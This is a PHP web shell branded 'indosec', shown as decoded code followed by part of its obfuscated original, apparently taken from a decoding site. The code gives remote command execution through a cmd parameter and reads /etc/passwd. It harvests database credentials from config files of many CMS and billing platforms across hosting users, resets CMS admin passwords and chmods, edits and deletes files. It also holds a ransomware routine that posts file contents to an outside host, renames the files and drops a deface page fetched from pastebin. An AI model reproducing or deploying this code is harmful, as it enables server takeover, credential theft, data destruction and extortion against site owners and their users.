Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => <a href='{$target}/lokomedia/adminweb' target='_blank'><u>{$target}/lokomedia/adminweb</u></a><br>"; } else { $url_target = "Login => <a href='{$target}' target='_blank'><u>{$target}</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; } } $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE level='admin'"); echo "Config => " . $file_conf . "<br>"; echo "CMS => Lokomedia<br>"; if (preg_match("/Error, Tidak dapat mengambil nama domainnya/", $url_target)) { echo $url_target2; } else { echo $url_target; } if (!$update or !$conn or !$db) { echo "Status => <font color=red>" . mysql_error() . "</font><br><br>"; } else { echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>"; } mysql_close($conn); } } } } else { echo "\xa\x9\x9\x9<h4 class='text-center mb-5'>Auto Edit User</h4>\xa\x9\x9\x9<form method='post'>\xa	\x9		<h5>Lokasi Dir Config</h5>
\x9\x9\x9	<input type='text' class='form-control mb-3' name='config_dir' value='{$dir}'>\xa\x9\x9		<h5>Set User & Pass :</h5>
\x9	\x9\x9<input type='text' name='user_baru' value='indosec' class='form-control mb-3' placeholder='Username Baru'>
\x9\x9\x9	<input type='text' name='pass_baru' value='indosec' class='form-control mb-4' placeholder='Password Baru'>
	\x9	\x9<input type='submit' name='hajar' value='Edit User' class='btn btn-danger btn-block'>
		\x9</form>\xa\x9\x9\x9<p class='text-muted mb-4'>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</p>"; } die; } goto E44u8; XV3ue: if ($_GET["aksi"] == "hapusf") { $nama = basename($file); echo "[ <a href="?dir=" . $dir . "&aksi=view&file=" . $file . "">Lihat</a> ]  [ <a href="?dir=" . $dir . "&aksi=edit&file=" . $file . "">Edit</a> ]  [ <a href="?dir=" . $dir . "&aksi=rename&file=" . $file . "">Rename</a> ]  [ <a class="active" href="?dir=" . $dir . "&aksi=hapusf&file=" . $file . "">Delete</a> ]"; echo "\xa		\x9<div class='card card-body text-center'>\xa		\x9\x9\x9<font color='black'>Yakin Menghapus : {$nama}</font>\xa\x9	\x9	<br/>\xa\x9\x9\x9\x9<form method='POST'>
\x9			\x9<a class='btn btn-danger btn-block' href='?dir={$dir}'>Tidak</a>
	\x9		\x9<input type='submit' name='ya' class='btn btn-success btn-success btn-block' value='Ya'>
\x9	\x9	</form>\xa\x9	\x9</div>"; if ($_POST["ya"]) { $hapus = unlink($file); if ($hapus) { echo "<script>window.location="?dir=" . $dir . ""; alert("Berhasil Menghapus File");</script>"; } else { echo "<script>alert("Gagal Menghapus File!");</script>"; } } } goto O8Mx0; V40Ns: if ($_GET["aksi"] == "adminer") { $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $path); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists("adminer.php")) { echo "<a href='{$full}/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>"; } else { if (adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php", "adminer.php")) { echo "<a href='{$full}/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>"; } else { echo "<p class='text-center text-danger'>Gagal Membuat Adminer</p>"; } } die; } goto O0b8k; tUIs1: if ($_GET["aksi"] == "edit") { $nama = basename($file); echo "[ <a href="?dir=" . $dir . "&aksi=view&file=" . $file . "">Lihat</a> ]  [ <a class="active" href="?dir=" . $dir . "&aksi=edit&file=" . $file . "">Edit</a> ]  [ <a href="?dir=" . $dir . "&aksi=rename&file=" . $file . "">Rename</a> ]  [ <a href="?dir=" . $dir . "&aksi=hapusf&file=" . $file . "">Delete</a> ]"; echo "<form method='POST'>
		\x9	<h5><i class='fa fa-file'></i> Edit File : {$nama}</h5>
\x9\x9	\x9<textarea rows='9' class='form-control' name='isi'>" . htmlspecialchars(file_get_contents($file)) . "</textarea><br/>\xa	\x9		\x9<button type='sumbit' class='btn btn-info btn-block' name='edit_file'>Update</button>\xa	\x9	</form>"; if (isset($_POST["edit_file"])) { $updt = fopen("{$file}", "w"); $hasil = fwrite($updt, $_POST["isi"]); if ($hasil) { echo "<script>window.location="?dir=" . $dir . ""; alert("Berhasil Update!!");</script>"; } else { echo "<script>alert("Gagal Update!!");</script>"; } } } goto yBPPy; Dq2KF: $pers = (int) ($free / $total * 100); goto ONUBQ; OKr2f: if ($_GET["aksi"] == "bypascf") { echo "<form method="POST"><br>	\x9\x9\xa\x9	\x9<div class="form-group input-group">\xa	\x9		<select class="form-control" name="idsPilih">\xa		\x9\x9\x9<option>Pilih Metode</option>\xa\x9\x9\x9\x9	<option>ftp</option>
\x9\x9		\x9<option>direct-conntect</option>
\x9		\x9	<option>Webmail</option>\xa\x9		\x9	<option>Cpanel</option>
	\x9	\x9</select>
			</div>
	\x9\x9<div class="form-group input-group">\xa	\x9		<input class="form-control" type="text" name="target" placeholder="Masukan Url">
	\x9	\x9<input class="btn btn-danger form-control" type="submit" value="Bypass">\xa	\x9\x9</div><br>
\x9	</form>"; $target = $_POST["target"]; if ($_POST["idsPilih"] == "ftp") { $ftp = gethostbyname("ftp." . "{$target}"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct \xa\x9		ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$ftp}</font></p>"; } if ($_POST["idsPilih"] == "direct-conntect") { $direct = gethostbyname("direct-connect." . "{$target}"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct \xa\x9\x9	ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$direct}</font></p>"; } if ($_POST["idsPilih"] == "webmail") { $web = gethostbyname("webmail." . "{$target}"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct 
	\x9	ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$web}</font></p>"; } if ($_POST["idsPilih"] == "cpanel") { $cpanel = gethostbyname("cpanel." . "{$target}"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct \xa	\x9\x9ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>{$cpanel}</font></p>"; } die; } goto Qlhck; Y8MkE: $ver = phpversion(); goto f2PCb; O8Mx0: if ($_GET["aksi"] == "buat_folder") { $output = "
	\x9\x9<h4><img src='http://aux.iconspalace.com/uploads/folder-icon-256-1787672482.png' class='ico'></img> Buat Folder: </h4>\xa\x9		<form method='POST'>
				<input type='text' class='form-control' name='nama_folder' autocomplete='off' placeholder='Nama Folder...'><br/>\xa\x9\x9\x9	<button type='sumbit' class='btn btn-info btn-block' name='buat'>Buat!!</button>
		\x9</form>"; echo $output; if (isset($_POST["buat"])) { $nama_folder = $_POST["nama_folder"]; $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $_POST["nama_folder"]); $fd = mkdir($folder); if ($fd) { echo "<script>window.location="?dir=" . $dir . ""; alert("Berhasil Membuat Folder " . $folder . "");</script>"; } else { echo "echo '<script> alert('Folder " . $folder . " Gagal Dibuat');</script>"; } } } goto fJEHo; JOAz0: if ($_GET["aksi"] == "chmod_dir") { $nama = basename(getcwd()); echo "<form method='POST'>
		\x9	<h5>Chmod Folder : {$nama} </h5>\xa		\x9	<div class='form-group input-group'>\xa			\x9\x9<input type='text' name='perm' class='form-control' value='" . substr(sprintf("%o", fileperms($_GET["dir"])), -4) . "'>\xa	\x9\x9		<input type='submit' class='btn btn-danger form-control' value='Chmod' name='chmo'>\xa	\x9		</div>\xa\x9\x9\x9</form>"; if (isset($_POST["chmo"])) { if (chmod($_GET["dir"], $_POST["perm"])) { echo "<font color="lime">Change Permission Berhasil</font><br/>"; } else { echo "<font color="white">Change Permission Gagal</font><br/>"; } } } goto L24e8; ONUBQ: function formatSize($bytes) { $types = array("B", "KB", "MB", "GB", "TB"); for ($i = 0; $bytes >= 1024 && $i < count($types) - 1; $bytes /= 1024, $i++) { } return round($bytes, 2) . " " . $types[$i]; } goto e8ESb; vk5Bh: @clearstatcache(); goto VY1ts; kcGCA: if ($_GET["aksi"] == "config") { if ($_POST) { $passwd = $_POST["passwd"]; mkdir("indosec_config", 511); $isi_htc = "Options allnRequire NonenSatisfy Any"; $htc = fopen("indosec_config/.htaccess", "w"); fwrite($htc, $isi_htc); preg_match_all("/(.*?):x:/", $passwd, $user_config); foreach ($user_config[1] as $user_con) { $user_config_dir = "/home/{$user_con}/public_html/"; if (is_readable($user_config_dir)) { $grab_config = array("/home/{$user_con}/.my.cnf" => "cpanel", "/home/{$user_con}/public_html/config/koneksi.php" => "Lokomedia", "/home/{$user_con}/public_html/forum/config.php" => "phpBB", "/home/{$user_con}/public_html/sites/default/settings.php" => "Drupal", "/home/{$user_con}/public_html/config/settings.inc.php" => "PrestaShop", "/home/{$user_con}/public_html/app/etc/local.xml" => "Magento", "/home/{$user_con}/public_html/admin/config.php" => "OpenCart", "/home/{$user_con}/public_html/application/config/database.php" => "Ellislab", "/home/{$user_con}/public_html/vb/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/forum/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/forums/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/cc/includes/config.php" => "Vbulletin", "/home/{$user_con}/public_html/inc/config.php" => "MyBB", "/home/{$user_con}/public_html/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/shop/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/os/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/oscom/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/products/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/cart/includes/configure.php" => "OsCommerce", "/home/{$user_con}/public_html/inc/conf_global.php" => "IPB", "/home/{$user_con}/public_html/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/wp/test/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/blog/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/beta/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/portal/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/site/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/wp/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/WP/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/news/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/wordpress/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/test/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/demo/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/home/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/v1/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/v2/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/press/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/new/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/blogs/wp-config.php" => "Wordpress", "/home/{$user_con}/public_html/configuration.php" => "Joomla", "/home/{$user_con}/public_html/blog/configuration.php" => "Joomla", "/home/{$user_con}/public_html/submitticket.php" => "^WHMCS", "/home/{$user_con}/public_html/cms/configuration.php" => "Joomla", "/home/{$user_con}/public_html/beta/configuration.php" => "Joomla", "/home/{$user_con}/public_html/portal/configuration.php" => "Joomla", "/home/{$user_con}/public_html/site/configuration.php" => "Joomla", "/home/{$user_con}/public_html/main/configuration.php" => "Joomla", "/home/{$user_con}/public_html/home/configuration.php" => "Joomla", "/home/{$user_con}/public_html/demo/configuration.php" => "Joomla", "/home/{$user_con}/public_html/test/configuration.php" => "Joomla", "/home/{$user_con}/public_html/v1/configuration.php" => "Joomla", "/home/{$user_con}/public_html/v2/configuration.php" => "Joomla", "/home/{$user_con}/public_html/joomla/configuration.php" => "Joomla", "/home/{$user_con}/public_html/new/configuration.php" => "Joomla", "/home/{$user_con}/public_html/WHMCS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmcs1/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/WHMC/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Whmc/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whmc/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/WHM/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Whm/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/whm/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/HOST/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Host/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/host/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SUPPORTES/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Supportes/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/supportes/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/domains/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/domain/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Hosting/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/HOSTING/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/hosting/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CART/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Cart/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/cart/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/ORDER/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Order/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/order/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Client/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/client/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENTAREA/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Clientarea/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clientarea/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SUPPORT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Support/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/support/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILLING/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Billing/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/billing/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BUY/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Buy/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/buy/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/MANAGE/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Manage/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/manage/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/ClientSupport/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Clientsupport/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clientsupport/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CHECKOUT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Checkout/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/checkout/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BASKET/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Basket/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/basket/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SECURE/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Secure/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/secure/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/SALES/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Sales/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/sales/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILL/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Bill/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/bill/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/PURCHASE/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Purchase/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/purchase/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/ACCOUNT/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Account/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/account/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/USER/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/User/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/user/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/CLIENTS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Clients/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clients/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/Billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/billings/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/MY/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/My/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/my/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/secure/whm/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/secure/whmcs/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/panel/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/clientes/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/cliente/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/support/order/submitticket.php" => "WHMCS", "/home/{$user_con}/public_html/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/boxbilling/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/box/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/host/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/Host/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/supportes/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/support/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/hosting/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/cart/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/order/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/client/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/clients/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/cliente/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/clientes/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/billing/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/billings/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/my/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/secure/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/support/order/bb-config.php" => "BoxBilling", "/home/{$user_con}/public_html/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/zencart/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/products/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/cart/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/shop/includes/dist-configure.php" => "Zencart", "/home/{$user_con}/public_html/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/hostbills/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/host/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/Host/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/supportes/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/support/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/hosting/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/cart/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/order/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/client/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/clients/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/cliente/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/clientes/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/billing/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/billings/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/my/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/secure/includes/iso4217.php" => "Hostbills", "/home/{$user_con}/public_html/support/order/includes/iso4217.php" => "Hostbills"); foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("indosec_config/{$user_con}-{$nama_config}.txt", "w"); fputs($file_config, $ambil_config); } } } } echo "<p class='text-center'>Success Get Config!!</p>\xa\x9		<a href='?dir={$dir}/indosec_config' class='btn btn-success btn-block mb-4'>Click Here</a>"; } else { echo "<form method='post'>
\x9	\x9\x9<p class='text-danger'>/etc/passw error ?  <a href='?dir=" . $dir . "&aksi=passwbypass'>Bypass Here</a></p>\xa\x9\x9	\x9<textarea name='passwd' class='form-control' rows='10'>" . file_get_contents("/etc/passwd") . "</textarea><br/>
	\x9	\x9<input type='submit' class='btn btn-danger btn-block' value='Get Config!!'>"; } die; } goto hw3d7; sI6zX: $default_use_ajax = true; goto jAcCG; u7SA4: error_reporting(0); goto oAS2R; Qlhck: if (isset($_GET["path"])) { $path = $_GET["path"]; chdir($path); } else { $path = getcwd(); } goto gmIGR; e8ESb: function ambilKata($param, $kata1, $kata2) { if (strpos($param, $kata1) === FALSE) { return FALSE; } if (strpos($param, $kata2) === FALSE) { return FALSE; } $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } goto HdX2w; bVW_6: if (isset($_GET["cmd"])) { echo "<pre class='text-white'>"; echo system($_GET["cmd"]); echo "</pre>"; die; } goto rqHo2; VE56d: $paths = explode("/", $path); goto oqZvC; teBsd: $curl = function_exists("curl_version") ? "<font color=green>ON</font>" : "<font color=red>OFF</font>"; goto ob6mM; zyt1z: if (!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])) { if (empty($aupas) || isset($_POST["pass"]) && md5($_POST["pass"]) == $aupas) { $_SESSION[md5($_SERVER["HTTP_HOST"])] = true; } else { login_shell(); } } goto vPQRS; vYk78: $ip = getHostByName(getHostName()); goto Y8MkE; HdX2w: $d0mains = @file("/etc/named.conf", false); goto xA6Sm; KPY1y: echo "&nbsp;&nbsp;[ " . w($dir, perms($dir)) . " ]"; goto DE8WR; xA6Sm: if (!$d0mains) { $die = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>"; $GLOBALS["need_to_update_header"] = "true"; } else { $count = 0; foreach ($d0mains as $d0main) { if (@strstr($d0main, "zone")) { preg_match_all("#zone "(.*)"#", $d0main, $domains); flush(); if (strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } $dom = "{$count} Domain"; } goto DgzH7; B7fRz: if ($_GET["aksi"] == "view") { echo "[ <a class="active" href="?dir=" . $dir . "&aksi=view&file=" . $file . "">Lihat</a> ]  [ <a href="?dir=" . $dir . "&aksi=edit&file=" . $file . "">Edit</a> ]  [ <a href="?dir=" . $dir . "&aksi=rename&file=" . $file . "">Rename</a> ]  [ <a href="?dir=" . $dir . "&aksi=hapusf&file=" . $file . "">Delete</a> ]"; echo "
\x9		<textarea rows='9' class='form-control mb-2' disabled=''>" . htmlspecialchars(file_get_contents($file)) . "</textarea>"; } goto tUIs1; E44u8: if ($_GET["aksi"] == "ransom") { echo "<form method="post">
			<div class="form-group">\xa\x9	\x9	<h5 class="text-center"><i class="fa fa-lock"></i> Pilih Directory Yang Ingin Di Encrypt</h5>\xa				<input type="text" name="path" class="form-control mb-2" value="" . $dir . ""/><br/>\xa\x9\x9\x9	<input type="submit" name="encrypt" class="btn btn-danger btn-block" value="Encrypt"/>\xa			</div>\xa\x9\x9</form>"; if (isset($_POST["encrypt"])) { $dir = $_POST["path"]; echo "<textarea class='form-control mb-4' rows='10' disabled=''>"; function listFolderFiles($dir) { if (is_dir($dir)) { $ffs = scandir($dir); unset($ffs[array_search(".", $ffs, true)]); unset($ffs[array_search("..", $ffs, true)]); if (count($ffs) < 1) { return; } foreach ($ffs as $ff) { $files = $dir . "/" . $ff; if (!is_dir($files)) { $file = file_get_contents($files); $_a = base64_encode($file); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://encrypt.indsc.me/api.php?type=encrypt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "text={$_a}"); $x = json_decode(curl_exec($ch)); if ($x->status == "success") { $_enc = base64_decode($x->data); rename($files, $files . ".indsc"); echo "[+]{$files} => Success Encrypted
"; } } if (is_dir($dir . "/" . $ff)) { listFolderFiles($dir . "/" . $ff); } } $index = file_get_contents("https://pastebin.com/raw/aGZ6BeTH"); $_o = fopen($dir . "/index.html", "w"); fwrite($_o, $index); fclose($_o); echo "
[+] Done !"; } else { echo "
Bukan dir"; } } listFolderFiles($dir); echo "</textarea><br/>"; } die; } goto PDFOO; HR7MM: ?>

Did this file decode correctly?

Original Code

 <?php goto LB30f; sUlgs: $default_action = "\x46\151\x6c\145\163\115\x61\156"; goto sI6zX; f2PCb: $web = $_SERVER["\x48\124\124\120\x5f\x48\117\x53\124"]; goto WRL5A; hw3d7: if ($_GET["\x61\x6b\163\x69"] == "\x70\141\x73\x73\x77\x62\171\x70\x61\x73\x73") { echo "\74\x64\151\x76\40\143\154\x61\x61\163\75\x22\143\157\x6e\164\x61\x69\x6e\145\x72\x22\76\12\x9\x9\11\x3c\x66\157\x72\x6d\40\x6d\x65\x74\x68\157\144\75\x22\x50\x4f\123\x54\42\76\12\x9\x9\x9\x9\x3c\x70\40\x63\154\x61\163\163\x3d\42\164\x65\x78\164\55\x63\145\156\164\145\x72\x22\x3e\102\x79\x70\141\163\163\x20\145\x74\x63\x2f\160\141\x73\163\167\x64\x20\127\x69\164\150\x20\x3a\x3c\x2f\160\76\12\11\11\x9\11\74\x64\x69\166\x20\143\154\x61\x73\x73\75\x22\x64\55\146\154\145\x78\40\x6a\165\163\164\151\x66\171\55\x63\157\x6e\164\x65\156\164\55\143\145\156\164\x65\162\x20\146\x6c\145\170\x2d\167\162\x61\160\42\x3e\xa\11\x9\x9\11\11\74\x69\156\x70\x75\x74\x20\164\x79\160\x65\x3d\x22\x73\x75\x62\x6d\151\x74\x22\x20\x63\154\x61\163\x73\x3d\x22\x66\x69\164\165\x72\145\40\142\164\156\x20\x62\x74\156\x2d\144\x61\x6e\x67\145\162\40\142\x74\156\55\163\x6d\42\x20\x76\x61\x6c\165\145\x3d\x22\123\x79\163\x74\x65\155\x20\x46\x75\156\x63\164\151\157\156\x22\40\x6e\141\x6d\145\75\x22\163\171\x73\164\x22\76\xa\11\x9\x9\11\11\x3c\151\156\160\165\164\40\164\171\x70\x65\x3d\x22\x73\x75\x62\155\x69\164\x22\x20\x63\x6c\141\163\163\75\x22\146\151\164\165\162\x65\x20\x62\x74\x6e\40\142\x74\156\55\144\141\156\x67\x65\x72\40\x62\x74\156\55\x73\x6d\42\x20\x76\x61\154\x75\x65\75\x22\120\141\x73\163\x74\x68\x72\x75\x20\x46\x75\x6e\x63\164\x69\x6f\156\x22\x20\x6e\141\155\145\x3d\42\160\141\x73\163\164\x68\x22\76\xa\11\x9\11\11\11\74\151\x6e\160\165\164\x20\164\171\160\145\75\42\163\x75\x62\x6d\x69\x74\42\x20\143\154\141\163\163\75\x22\146\x69\x74\165\162\x65\40\142\164\x6e\x20\142\164\156\55\144\x61\x6e\147\145\162\40\x62\x74\x6e\55\163\x6d\42\x20\166\x61\x6c\x75\145\x3d\42\105\x78\x65\143\x20\x46\165\156\x63\x74\x69\x6f\156\x22\x20\x6e\141\155\145\x3d\x22\x65\x78\42\76\xa\x9\x9\11\11\x9\x3c\x69\156\160\165\x74\x20\x74\171\160\145\x3d\x22\x73\165\x62\x6d\151\x74\x22\x20\x63\x6c\141\x73\x73\x3d\42\146\151\x74\x75\162\x65\40\142\164\x6e\x20\x62\164\x6e\55\x64\x61\x6e\x67\145\x72\x20\x62\164\156\55\163\155\42\x20\x76\x61\x6c\165\145\x3d\42\x53\x68\x65\x6c\x6c\x5f\145\x78\145\143\x20\x46\x75\x6e\143\164\151\157\156\x22\x20\156\x61\x6d\x65\75\x22\163\x68\x65\170\x22\76\xa\11\11\x9\11\11\x3c\x69\156\x70\165\164\40\164\x79\160\x65\x3d\x22\x73\x75\x62\x6d\151\x74\42\x20\x63\154\141\163\x73\x3d\x22\146\x6